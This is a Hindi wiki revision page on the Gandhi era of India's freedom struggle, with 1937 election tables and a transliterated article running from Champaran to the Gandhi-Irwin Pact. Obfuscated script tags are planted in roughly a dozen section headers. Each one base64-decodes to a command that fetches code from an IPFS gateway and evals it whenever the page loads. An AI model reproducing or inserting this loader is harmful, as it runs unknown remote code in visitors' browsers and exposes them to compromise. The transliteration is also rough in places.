Difference between revisions of "गाँधी युग"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 116: Line 116:
 
गाँधी जी ने हरिजनों के उत्थान के लिए अपना बहुमूल्य योगदान दिया। प्रसिद्ध 'पूना समझौते' के बाद गाँधी जी ने अपने आपको पूरी तरह से हरिजनों की सेवा में समर्पित कर दिया। जेल से छूटने के बाद उन्होंने 1932 ई. में 'अखिल भारतीय छुआछूत विरोधी लीग' की स्थापना की।
 
====कांग्रेस समाजवादी दल====
 
====कांग्रेस समाजवादी दल====
 +
{|class="bharattable-green" border="1" style="margin:5px; float:right"
 +
|+चुनाव परिणाम (1937 ई.)
 +
!प्रांत
 +
!कुल सीटें
 +
!कांग्रेस को प्राप्त सीटें
 +
|-
 +
|[[बंगाल]]
 +
|250
 +
|60
 +
|-
 +
|[[उत्तर प्रदेश]]
 +
|228
 +
|134
 +
|-
 +
|[[मद्रास]]
 +
|215
 +
|159
 +
|-
 +
|[[बम्बई]]
 +
|175
 +
|87
 +
|-
 +
|[[पंजाब]]
 +
|175
 +
|18
 +
|-
 +
|[[बिहार]]
 +
|152
 +
|95
 +
|-
 +
|सेट्रल प्राविंस (सी.पी.)
 +
|112
 +
|70
 +
|-
 +
|[[असम]]
 +
|108
 +
|35
 +
|-
 +
|[[उड़ीसा]]
 +
|60
 +
|36
 +
|-
 +
|[[सिंध प्रदेश|सिंध]]
 +
|60
 +
|08
 +
|-
 +
|उत्तर-पश्चिम प्रांत
 +
|50
 +
|19
 +
|-
 +
|कुल
 +
|1585
 +
|721
 +
|-
 +
|}
 +
 
{{main|कांग्रेस समाजवादी दल}}
 
{{main|कांग्रेस समाजवादी दल}}
 
'कांग्रेस समाजवादी दल' की स्थापना 1934 ई. में आचार्य नरेन्द्र देव, [[जयप्रकाश नारायण]], मीनू मसानी एवं अशोक मेहता के प्रयत्नों से की गयी थी। इस दल का प्रथम सम्मेलन 1934 ई. में [[पटना]] मे हुआ। इस पार्टी की स्थापना का उद्देश्य ये माँगे थीं- देश की आर्थिक विकास की प्रक्रिया राज्य द्वारा नियोजित एवं नियंत्रित हो, राजाओं और ज़मींदारों का उन्मूलन बगैर मुआवजे के किया जाए। [[जुलाई]], 1931 ई. में [[बिहार]] में समाजवादी दल की स्थापना जयप्रकाश नारायण, फूलन प्रसाद वर्मा एवं कुछ अन्य लोगों ने मिलकर की।
 
==1937 ई. के बाद चुनाव==
+
==प्रांतीय विधानसभा चुनाव==
 
'भारत सरकार अधिनियम' [[1935]] के द्वारा भारतीयों को प्रान्तीय शासन प्रबन्ध का अधिकार मिल गया। इसके परिणामस्वरूप [[1937]] ई. में प्रान्तीय विधानसभाओं के चुनाए हुए। [[कांग्रेस]] को संयुक्त प्रांत, [[मद्रास]], [[मध्य प्रदेश]], [[बरार]], [[उड़ीसा]] तथा [[बिहार]] में पूर्ण बहुतमत प्राप्त हुआ, जबकि केंद्रीय व्यवस्थापिका सभा में वह सबसे बड़े दल के रूप में उभर कर आयी। कांग्रेस ने इस आश्वासन पर कि गवर्नर बिना वजह हस्तक्षेप नहीं करेंगें, 8 प्रान्तों में अपनी सरकार बनायी तथा [[सिंध]], उत्तर-पश्चिम सीमा प्रांत तथा [[असम]] में मिला-जुला मंत्रिमण्डल बना। गैर-कांग्रेसी मंत्रिमण्डल [[बंगाल]] एवं [[पंजाब]] बना। पंजाब में 'यूनियनिस्ट पार्टी' ने और बंगाल में 'कृषक प्रजा पार्टी' और [[मुस्लिम लीग]] ने मिलकर सरकार बनायी। 1937 ई. में प्रांतीय विधानसभा चुनावों के साथ ही विधान परिषदों के लिए भी चुनाव संपन्न कराये गये। पांच प्रांतों, [[बम्बई]], मद्रास, बंगाल, बिहार और [[उत्तर प्रदेश]] के विधान परिषदों के लिए संपन्न चुनाव में कांग्रेस को आंशिक सफलता प्राप्त हुई।
 
इस समय मुस्लिम लीग ने यह प्रचार करना प्रारम्भ कर दिया कि [[मुस्लिम|मुस्लिमों]] का हित कांग्रेस के हाथ में सुरक्षित नहीं है। [[1939]] ई. में द्वितीय विश्वयुद्ध के प्रारम्भ होने पर तत्कालीन वायसराय लॉर्ड लिनलिथगो ने भारतीय विधानमण्डल की सहमति के बिना भारत को युद्ध में शामिल कर लिया तथा देश में आपातकाल की घोषणा कर दी। कांग्रेस कार्य समिति ने युद्ध के उद्देश्यों की घोषणा करने की मांग की तथा यह भी मांग रखी कि युद्ध के बाद भारत को स्वतंत्र कर दिया जाये। सरकार ने इस मांग की उपेक्षा की। [[वायसराय]] ने 'औपनिवेशिक स्वराज्य' का रटा-रटाया संवाद बोल दिया। कांग्रेस कार्यकारिणी के अदेश पर [[15 नवम्बर]], 1939 ई. को प्रांतीय कांग्रेस मंत्रिमण्डलों ने इस्तीफा दे दिया। कांग्रेस मंत्रिमण्डल के त्यागपत्र दिये जाने के बाद मुस्लिम लीग ने [[22 दिसम्बर]], 1939 ई. को 'मुक्ति दिवस' के रूप में मनाया।
 
|+विधानपरिषद चुनाव परिणाम (1937 ई.)
 +
!प्रांत
 +
!कुल सीटें
 +
!कांग्रेस को प्राप्त सीटें
 +
|-
 +
|[[बंगाल]]
 +
|57
 +
|09
 +
|-
 +
|[[उत्तर प्रदेश]]
 +
|52
 +
|08
 +
|-
 +
|[[मद्रास]]
 +
|46
 +
|26
 +
|-
 +
|[[बम्बई]]
 +
|26
 +
|13
 +
|-
 +
|[[बिहार]]
 +
|26
 +
|08
 +
|-
 +
|}
  
गाँधी जी ने [[17 अक्टूबर]], [[1940]] ई. को 'व्यक्तिगत सत्याग्रह आन्दोलन' शुरू किया। यह आंदोलन एक तरह से 'व्यक्तिगत सविनय अवज्ञा आंदोलन' था। इस आंदोलन के पहले सत्याग्रही विनोबा भावे थे। उन्होंने 17 अक्टूबर, 1940 ई. को पवनार में [[सत्याग्रह]] शुरू किया। दूसरे सत्याग्रही [[जवाहरलाल नेहरू]] थे। इस आंदोलन को 'दिल्ली चलो आन्दोलन' भी कहा गया। इस सत्याग्रह का मुख्य उद्देश्य ब्रिटिश सरकार के उस दावे को खोखला साबित करना था कि [[भारत]] की जनता द्वितीय विश्वयुद्ध में सरकार के साथ है।
 
Revision as of 10:04, 2 May 2012

[[chitr:Mahatma-Gandhi-1.jpg|thumb|250px|mahatma gaandhi]] gaandhi ji bharat ke un kuchh chamakate hue sitaroan me se ek the, jinhoanne desh ki svatantrata evan rashtriy ekata ke lie apana poora jivan samarpit kar diya. ianglaind se bairistari ki padhaee samapt karane ke bad gaandhi ji bharat aye. yahaan se 1893 ee. mean afrika gaye or vahaan par apane 20 varsh ke pravas ke dauran british sarakar ki rang-bhed ki niti ke viruddh l daee l date rahe. yahian par gaandhi ji ne sarvapratham 'satyagrah aandolan' chalaya.

gaandhi-gokhale bheant

janavari, 1915 ee. mean ve bharat aye aur yahaan par unaka sampark gopal krishna gokhale se hua, jinhean unhoanne apana rajanitik guru banaya. gokhale ke prabhav mean akar hi gaandhi ji ne apane ko bharat ki sakriy rajaniti se jo d liya. gaandhi ji ke bharatiy rajaniti mean pravesh ke samay british sarakar pratham vishv yuddh (1914-1918 ee.) mean phansi thi. gaandhi ji ne sarakar ko poorn sahayog diya, kyoanki vah yah manakar chal rahe the ki british sarakar yuddh ki samapti par bharatiyoan ko sahayog ke pratiphal ke roop mean svarajy de degi. gaandhi ji ne logoan ko sena mean bharti hone ke lie protsahit kiya. isake phalasvaroop kuchh log unhean "bharti karane vala sarjent" kahane lage.

nil ki kheti

1916 ee. mean gaandhi ji ne ahamadabad ke pas 'sabaramati ashram' ki sthapana ki aur aprail, 1917 mean bihar mean sthit champaran zile mean kisanoan par kiye ja rahe atyachar ke khilaf andolan chalaya. dakshin afrika mean gaandhi ji ke sangharsh ki kahani sunakar champaran (bihar) ke anek kisanoan, jinamean ramachandr shukl pramukh the, ne gaandhi ji ko amantrit kiya. yahaan nil ke khetoan mean kary karane vale kisanoan par yooropiy nilahe bahut adhik atyachar kar rahe the. unhean jamin ke kam se kam 3/20 bhag par nil ki kheti karana tatha nilahoan dvara tay damoan par use bechana p data tha. isi tarah ki paristhitiyoan se 1859-1860 ee. ke nil aandolan mean bangal ke kisanoan ne yooropiy bagan malikoan se mukti payi thi. gaandhi ji, baboo rajendr prasad, majaharool-hak, je.bi. kripalani, narahari parikh aur mahidev desaee ke sath 1917 ee. mean champaran pahuanche aur kisanoan ki sthiti ki jaanch karane lage. vivash hokar sarakar ko ek jaanch samiti niyukt karani p di, jisake ek sadasy svany gaandhi ji the. gaandhi ji ke prayatnoan se kisanoan ki samasyaoan mean kami ayi. 1918 ee. mean gujarat ke khe da zila mean 'kar nahian andolan' chalaya gaya. isi varsh gaandhi ji ne ahamadabad ke majadooroan aur mil malikoan ke vivad mean hastakshep kar majadooroan ki majadoori mean 35% ki vriddhi karayi. apani rajaniti ke prarambhik dino mean gaandhi ji ne british sarakar ke sanvaidhanik sudharoan ki prakriya ki prashansa ki, par 1919 ee. ke jaliyaanvala bag hatya kand ke bad sarakar ke sandarbh mean gaandhi ji ka poora drishtikon badal gaya.

khilafat andolan

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

'khilafat andolan' (1919-1922 ee.) ka sootrapat bharatiy muslimoan ke ek bahusankhyak varg ne rashtriy star par kiya. gaandhi ji ne is andolan ko hindoo tatha muslim ekata ke liy upayukt samajha aur muslimoan ke prati apani sahanubhooti prakat ki. mahatma gaandhi ne 1919 ee. mean 'akhil bharatiy khilafat samiti' ka adhiveshan apani adhyakshata mean kiya. unake kahane par hi asahayog evan svadeshi ki niti ko apanaya gaya. 1918-1919 ee. ke madhy bharat mean 'khilafat andolan' maulana muhammad ali, shaukat ali evan abul kalam azad ke sahayog se zor pak data chala gaya.

asahayog andolan

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

asahayog andolan' ka sanchalan 'svaraj' ki maang ko lekar kiya gaya. isaka uddeshy sarakar ke sath sahayog n karake karyavahi mean badha upasthiti karana tha. sitambar, 1920 ee. mean 'asahayog andolan' ke karyakram par vichar karane ke lie kalakatta mean kaangres mahasamiti ke adhiveshan ka ayojan kiya gaya. is adhiveshan ki adhyakshata lala lajapat ray ne ki. isi adhiveshan mean kaangres ne pahali bar bharat mean videshi shasan ke viruddh karyavahi karane, vidhan parishadoan ka bahishkar karane tatha 'asahayog savinay avajna andolan' ko prarambh karane ka nirnay liya. is adhiveshan mean gaandhi ji ne prastav pesh karate hue kaha ki "aangrez sarakar shaitan hai, jisake sath sahayog sambhav nahian hai. aangrezi sarakar ko apani bhooloan par koee duahkh nahian hai, atah ham kaise svikar kar sakate haian ki navin vyavasthapikaean hamare svarajy ka marg prashast kareangi. svarajy ki prapti ke lie hamare dvara pragatishil ahiansatmak asahayog ki niti apanayi jani chahie." gaandhi ji ke is prastav ka virodh karate hue eni besent ne kaha ki "yah prastav bharatiy svatantrata ko sabase b da dhakka hai."

svarajy parti ki sthapana

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

'svarajy parti' ki sthapana 1 janavari, 1923 ee. mean parivartanavadiyoan ka netritv karate hue chitaranjan das aur pandit motilal neharoo ne vitthalabhaee patel, madan mohan malaviy aur jayakar ke sath milakar ilahabad mean ki. is parti ki sthapana kaangres ke khilaf ki gee thi. isake adhyaksh chitaranjan das tatha sachiv motilal neharoo banaye ge the. svarajy parti ke mukhy uddeshy nimnalikhit the-

  1. shighr-atishighr dominiyan stets prapt karana.
  2. poorn prantiy svayattata prapt karana.
  3. sarakari karyoan mean badha utpann karana.

svarajyavadiyoan ne vidhan mandaloan ke chunav l dane v vidhanamandaloan mean pahuanchakar sarakar ki alochana karane ki rananiti banaee. svarajyavadiyoan ko vishvas tha ki ve shaantipoorn upayoan se chunav mean bhag lekar apane adhik se adhik sadasyoan ko kauansil mean bhejakar us par apana niyantran sthapit kar leangean.

varasad andolan

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

'varasad andolan' (1923-1924 ee.) ka sanchalan saradar vallabh bhaee patel ke netritv mean gujarat mean kiya gaya tha. aangrez british sarakar dvara lagaye ge 'dakaiti kar' ke virodh mean is andolan ka sanchalan kiya gaya tha.

vayakom satyagrah

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

'vayakom satyagrah' (1924-1925 ee.) ek prakar ka gaandhivadi andolan tha. is andolan ka netritv ti.ke. madhavan, ke. kelappan tatha ke.pi. keshavamenan ne kiya. yah andolan travanakor ke ek mandir ke pas vali s dak ke upayog se sambandhit tha.

krantikari andolan ka doosara charan

aktoobar, 1924 ee. mean sabhi kraantikari daloan dvara lakhanoo mean ek sammelan ayojit kiya gaya. is sammelan mean shachindr nath sanyal, jagadish chandr chatarji aur ram prasad bismil adi shamil hue. naye netaoan mean bhagat sianh, shiv varma, sukhadev, bhagavati charan bohara aur chandrashekhar azad adi pramukh the.[[chitr:Ram-Prasad-Bismil.jpg|thumb|200px|ram prasad bismil]]

kakori kand

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

1924 ee. mean 'hindustan ripablikan esosieshin' ki sthapana huee. isake mukhy karyakarta shachindr nath sanyal, ram prasad bismil, yogesh chandr chatarji, ashafakulla khaan tatha roshan sianh adi the. uttar pradesh ke kraantikariyoan ne 9 agast, 1925 ee. ko kakori jane vali ga di mean loot-pat ki. is ghatana ko kalantar mean 'kakori kand' ke nam se jana gaya. is kand ke mukhy abhiyukt ram prasad bismil, ashafakulla khaan, shachindr bakhshi, rajendr lahi di, chandrashekhar azad evan bhagat sianh adi the. in netaoan par do varsh tak mukadama chalane ke bad bismil aur ashafakulla khaan ko phaansi tatha bakhshi ko ajivan karavas ki saza mili. chandrashekhar azad ke netritv mean sitambar, 1928 ee. ko dilli ke firozashah kotala maidan mean 'hindustan soshilist ripablikan esosieshan' ki sthapana huee, jisaka uddeshy bharat mean ek 'samajavadi ganatantr' ki sthapana karana tha.

bhagat sianh, sukhadev aur rajaguru ki shahadat

30 aktoobar, 1928 ee. ko lahaur se 'saiman kamishan' ke viruddh pradarshan karate samay pulis lathi charj mean ghayal ho jane se lala lajapat ray ki bad mean mrityu ho gayi. mrityu ka badala lene ke lie bhagat sianh ke netritv mean panjab ke kraantikariyoan ne 17 disambar, 1928 ko lahaur ke tatkalin sahayak pulis kaptan s aaundars ki goli marakar hatya kar di.[[chitr:Bhagat-Singh.gif|thumb|200px|left|bhagat sianh]] 'pablik sephti bil' pas hone ke virodh mean 8 aprail, 1929 ee. ko batukeshvar datt evan bhagat sianh ne 'sentral lejisletiv asembali' mean khali beanchoan par bam pheanka. is bam kand ka uddeshy kisi ki hatya karana nahian tha., ve to fraansisi kratikariyoan ke us kathan ko dohara bhar rahe the ki 'baharoan ko koee bat sunane ke lie adhik kolahal ki avashyakata p dati hai.' bhagat sianh aur batukeshvar datt ko chooanki is bam ghatana ke karan phaansi nahian di ja sakati thi, isalie unhean 's aaundars hatya kand' evan 'lahaur shadyantr' se jo d diya gaya. 23 march, 1931 ee. ko bhagat sianh, sukhadev aur rajaguru ko phaansi par lataka diya gaya. subhashachandr bos ne bhagat sianh ke bare mean kaha ki "bhagat sianh jindabad aur iankalab jindabad ka ek hi arth hai."

bangal ke prasiddh kraantikari soory sen, jisane aprail, 1930 ee. ko chatagaanv ke shastragar par akraman kiya tha, ko 12 janavari, 1934 ee. ko phaansi di gee. 1935 ee. ke 'bharat sarakar adhiniyam' ke parit hone ke bad kraantikari gatividhiyoan mean kuchh kami ayi, parantu 1940 ee. ke bad ye gatividhiyaan punah zor pak dane lagian. gaandhi ji ne bhagat sianh ke bare mean likha ki "hamare mastak bhagat sianh ki deshabhakti, sahas tatha bharatiy janata ke prati prem tatha balidan ke age jhuk jate haian." bharatiy rashtriy kaangres ne 18 agast, 1929 ee. ko sampoorn bharat mean 'rajanaitik pi ditoan ka din' manaya. is charan mean kraantikari netaoan ka jhukav kuchh-kuchh samajavad ki or ho raha tha. chandrashekhar azad ne 1928 ee. mean 'hindustan ripablikan esosieshan' ka nam badal kar 'hindustan soshalist ripablikan esosieshan' rakh diya. isi samay 'kraanti amar rahe' ka nara pahali bar lagaya gaya.

pramukh sh dayantroan ke charchit mamale
mamale varsh vishay
'peshavar sh dayantr mamala 1922-1924 ee. soviyat sangh se bharat ane vale samyavadi kraantikariyoan ka dal, jise samrat ke viruddh sh dayantr rachane ke aparadh mean bandi banaya gaya tha, un par peshavar mean mukadama chalakar in kraantikariyoan ko lambi sazaean di geean.
'kanapur sh dayantr mamala' 1924 ee. kamyunist neta shripad amrit daange, mujaffar ahamad, malini gupta evan shaukat usmani adi ko kanapur mean giraphtar kar 'kanapur sh dayantr' ke tahat chale mukadamean mean 4 varsh ka karavas diya gaya.
'meanrath sh dayantr mukadama' 1923 ee. 1929 ee. mean sarakar ne 32 aise vyaktiyoan ko giraphtar kiya, jinamean kraantikari rajaniti v tred yooniyan se ju de log evan tin aangrez kamyunist (filip spret, ven braidale evan lestar hachinsan) adi shamil the, par 'merath sh dayantr' ke tahat sadhe tin varsh tak mukadama chala. rashtriy star par yah mukadama khoob charchit raha. abhiyuktoan ki or se javaharalal neharoo, kailashanath katajoo evan d aauktar aansari adi ne pairavi ki.

saiman kamishan

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

'saiman kamishan' ki niyukti british pradhanamantri ne sar j aaun saiman ke netritv mean ki thi. is kamishan mean sat sadasy the, jo sabhi briten ki sansad ke manonit sadasy the. yahi karan tha ki ise 'shvet kamishan' kaha gaya. saiman kamishan ki ghoshana 8 navambar, 1927 ee. ko ki gee. kamishan ko is bat ki jaanch karani thi ki kya bharat is layak ho gaya hai ki yahaan logoan ko sanvaidhanik adhikar diye jaean. is kamishan mean kisi bhi bharatiy ko shamil nahian kiya gaya, jis karan isaka bahut hi tivr virodh hua.

neharoo samiti

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

'neharoo samiti' ka gathan 28 faravari, 1928 ee. ko ko kiya gaya tha. 'saiman kamishan' ke bahishkar ke bad bharat sachiv l aaurd barkan hed ne bharatiyoan ke samaksh ek chunauti rakhi ki ve aise sanvidhan ka nirman kar british sansad ke samaksh rakhean, jise sabhi daloan ka samarthan prapt ho. kaangres ne barkan hed ki is chunauti ko svikar kar liya. pandit motilal neharoo ko is samiti ka adhyaksh banaya gaya tha. samiti ke any sadasyoan mean, sar ali imam, em.es. ane, tejabahadur saproo, mangal sianh, ji.ar. pradhan, shoeb kureshi, subhashachandr bos, en.em. joshi aur ji.pi. pradhan adi the.

jinna ke chaudah sootr

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

'jinna ke chaudah sootr' vale maang patr ko 1929 ee. mean prastut kiya gaya tha. muhammad ali jinna muslim lig ke adhyaksh the aur ve 'neharoo samiti' dvara prastut ki gee 'neharoo riport' se asantusht the. yahi karan tha ki unhoanne riport ko asvikar kar diya. 'neharoo riport' se sikkh samuday bhi asantusht tha. muslim lig ne neharoo riport ke vikalp ke roop mean march, 1929 ee. mean jinna ke chaudah sootr vale maang-patr ko prastut kiya, ise hi 'jinna ke chaudah sootr' kaha jata hai.thumb|200px|vallbh bhaee patel

baradoli satyagrah

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

'baradoli satyagrah' 'bharatiy rashtriy andolan' ka sabase sangathit, vyapak evan saphal andolan raha hai. yah andolan sarakar dvara badhaye ge 30 pratishat kar ke virodh mean chalaya gaya tha. baradoli ke 'me data bandhuoan' (kalyan ji aur kuanvar ji) tatha dayal ji ne kisanoan ke samarthan mean 1922 ee. se andolan chalaya. bad mean isaka netritv saradar vallabh bhaee patel ne kiya. soorat (gujarat) ke baradoli taluke mean 1920 ee. mean kisanoan dvara 'lagan' n adayagi ka andolan chalaya gaya. is andolan mean keval 'kunabi-patidar' jatiyoan ke bhoo-svami kisanoan ne hi nahian, balki 'kaliparaj' (kale log) janajati ke logoan ne bhi hissa liya. sarakar dvara niyukt nyayik adhikari broomafild aur rajasv adhikari maiksavel ne mamale ki jaanch ki aur badhottari ko galat thaharite hue ise ghatakar 6.03 pratishat kar diya. andolan ke saphal hone par vahaan ki mahilaoan ne patel ko 'saradar' ki upadhi pradan ki.

poorn svaraj divas

chh: varsh ke lambe antaral ke bad 1927 ee. me gaandhi ji ne ek bar phir se sakriy rajaniti mean bhag lena shuroo kiya. kaangres par vam vicharadharaoan ke badhate prabhav ko dekhakar unhonean disambar, 1929 ee. mean lahaur mean ayojit kaangres ke etihasik adhiveshan mean javaharalal neharoo ko adhyaksh banavaya. ukt adhiveshan mean ek prastav parit kar kaangres ne 'poorn svarajy' ka apana lakshy ghoshit kiya. 31 disambar, 1929 ko rat ko 12 baje javaharalal neharoo ne ravi nadi ke tat par apar janasamooh ke madhy navagrihit tirange jhande ko phaharaya. is avasar par neharoo ji ne kaha ki "british satta ke samane ab adhik jhukana manushy aur eeshvar donoan ke lie viruddh aparadh hai." adhiveshan mean 26 janavari, 1930 ee. ko 'pratham svadhinata divas' ke roop mean manane ka nishchay kiya gaya. isi ke sath pratyek varsh 26 janavari ko 'svatantrata divas' ke roop mean manaye jane ki parampara shuroo huee. kaangres samiti ko us adhiveshan mean 'savinay avajna aandolan' prarambh karane ka adhikar mila.

gaandhi ji ki gyarah sootri maang

gaandhi ji ne l aaurd iravin evan raimje maikadonald ke sammukh 31 janavari, 1930 ee. ko 11 sootri prastav rakha, jo is prakar tha-

  1. rupaye ka punarmoolyan vinimay dar mean kami ek shiliang 4 peans ho.
  2. bhoo-rajasv 1/2 kiya jaye.
  3. madyanishedh lagoo kiya jaye.
  4. namak par laga kar samapt kiya jaye.
  5. sainik vyay mean 50 pratishat ki kami ho.
  6. adhik vetan pane vale sarakari padadhikariyoan ki sankhya kam ki jaye.
  7. videshi kap de par vishesh ayat kar lagaya jaye.
  8. tatakar vidheyak laya jaye.
  9. sabhi rajanitik bandi chho d diye jayean.
  10. guptachar vibhag ko samapt kiya jay.
  11. bharatiyoan ko atm-raksha ke lie hathiyar rakhane ka adhikar pradan kiya jay.

mahatma gaandhi ne kaha ki yadi 12 march, 1930 ee. tak maange nahian svikar ki gayian to ve namak qanoon ka ullanghan kareange. gaandhi ji ke uparyukt maang-patr par sarakar ne koee sakaratmak rukh nahian apanaya. isake phalasvaroop 14 faravari, 1930 ee. ko sabaramati mean kaangres ki ek baithak mean gaandhi ji ke netritv mean 'savinay avajna aandolan' ko chalane ka nishchay kiya gaya.

savinay avajna andolan

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

saiman kamishan ki asaphalata, neharoo riport ko asvikar kiya jana, kaangres ka 'lahaur adhiveshan' evan adhiveshan mean parit kiye gaye poorn svarajy ke prastav se svatantrata andolan sanbandhi ghatanaoan ka kram kafi tej ho gaya. gaandhi ji dvara vayasaray ke sammukh rakhe gaye gyarah sootri maang-patr par vichar n karane ke karan savinay avajna andolan avashyak ho gaya tha. savinay avajna andolan shuroo karane se pahale jab gaandhi ji vayasaray irvin se bat ki to vayasaray ne kaangres ki batoan par dhyan nahian diya. us samay gaandhi ji ne kaha tha ki- "kaangres ne roti ki maang ki aur use mila patthar." usake bad yah andolan prarambh ho gaya. gaandhi ji ne is ahiansatmak dhang se sarakar ke prati asahayog ka ravaiya apanaya. kalantar mean ise hi 'savinay avajna andolan' kaha gaya.[[chitr:Dandi-March-1.jpg|thumb|250px|gaandhi ji dvara daandi march]]

daandi march

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

gaandhi ji aur unake svayan sevakoan dvara 12 march, 1930 ee. ko daandi yatra prarambh ki gee. isaka mukhy uddeshy tha aangrezoan dvara banaye ge 'namak qanoon ko to dana'. gaandhi ji ne apane 78 svayan sevakoan, jinamean veb milar bhi ek tha, ke sath sabaramati ashram se 358 ki.mi. door sthit daandi ke lie prasthan kiya. lagabhag 24 din bad 6 aprail, 1930 ee. ko daandi pahuanchakar unhoanne samudratat par namak qanoon ko to da. gaandhi ji ki daandi yatra ke bare mean subhashachandr bos ne likha hai- "mahatma ji ki daandi march ki tulana 'ilba' se lautane par nepaliyan ke 'peris march' aur rajanitik satta prapt karane ke lie musolini ke 'rom march' se ki ja sakati hai." charoan taraf phaili is asahayog ki niti se aangrez british hukoomat buri tarah se jhalla gayi. 5 mee, 1930 ee. ko gaandhi ji ko giraphtar kar liya gaya. andolan ki prachandata ka ahasas kar tatkalin vayasaray l aaurd iravin ne gaandhi ji se samajhauta karana chaha.

gaandhi-iravin samajhauta

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

'gaandhi-iravin samajhauta' 5 march, 1931 ee. ko hua tha. mahatma gaandhi aur l aaurd iravin ke madhy hue is samajhaute ko 'dilli paikt' ke nam se bhi jana jata hai. gaandhi ji ne is samajhaute ko bahut mahattv diya tha, jabaki pandit javahar lal neharoo aur netaji subhashachandr bos ne isaki k di alochana ki. kaangresi bhi is samajhaute se poori tarah asantusht the, kyoanki gaandhi ji bharat ke yuva kraantikariyoan bhagat sianh, rajaguru aur sukhadev ko phaansi ke phande se bacha nahian pae the.

  • is samajhaute ki shartean nimnalikhit thian-
  1. kaangres v usake karyakartaoan ki jabt ki gee sampatti vapas ki jaye.
  2. sarakar dvara sabhi adhyadeshoan evan apoorn abhiyagoan ke mamale ko vapas liya jaye.
  3. hiansatmak karyoan mean lipt abhiyuktoan ke atirikt sabhi rajanaitik qaidiyoan ko mukt kiya jaye.
  4. aphim, sharab evan videshi vastr ki dukanoan par shaantipoorn dhang se dharane ki anumati di jaye.
